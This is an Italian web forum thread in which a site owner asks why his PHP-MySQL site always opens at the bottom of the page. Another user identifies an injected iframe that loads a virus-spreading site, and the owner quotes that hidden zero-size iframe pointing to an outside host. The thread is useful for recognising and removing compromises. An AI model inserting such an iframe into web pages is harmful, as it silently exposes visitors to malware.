Visualizzazione dei risultati da 1 a 5 su 5

Problema all'apertura sito PHP-Mysql,sito si apre alla fine della pagina

Salve a tutti,
    Negli ultimi anni grazie a questo sito, e a questo forum, sono riuscito a mettere su un sito, senza aver avuto esperienze passate nel settore.
    Ogni volta quando trovavo una difficoltà trovavo una soluzione senza dover mai chiedere qualcosa a nessuno, e se il problema persisteva io ritentavo.

Questa volta la cosa è diversa, non riesco a comprendere completamente la natura del problema.
    Il problema riscontrato,è che all'apertura del sito,dopo il caricamento dell'intera pagina, mi viene mostrata sempre la fine della pagina.
    La cosa più pazzesca è che fino a ieri tutto funzionava perfettamente, e da una settimana circa non ho fatto modifiche alla struttura;
    Il problema sussiste con tutti i browser.
    Non so se la sezione in cui posto è quella giusta, ma cmq il sito l'ho realizzato in php-mysql.

Innanzitutto volevo sapere se :
    - è un problema lato server o lato client;
    - è mai successo a qualcun altro;
    - e ovviamenti i rimedi.
    Provate anche voi, e poi mi fate sapere, spero (anche se non troppo) che il problema è solo del mio pc.
    Il sito è: www.sicilydistrict.eu

Ciao ciao

Alessandro

Elimina il codice di Histats...

Ti hanno messo un iframe con un sito spara-virus.
    Ciao!

Adesso provvedo immediatamente, poi riprovo, e vi faccio sapere!

PROBLEMA RISOLTO!!!!!!!!

Wow, grazie mille, super tempistività!
    Hai risolto il problema;

Il problema era questo codice:

<iframe src="http://kolkoman.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Chissà da dove è comparso o perchè ha iniziato a fare danno solo adesso!

Cmq spero che questo post sarà utile anche a qualcun altro!

Grazie ancora!

probabilmente il provider proprietario del server su cui risiede il sito (non ci serve sapere il nome) è stato attaccato e hanno riempito le pagine dei siti web con l'iframe incriminato

Permessi di invio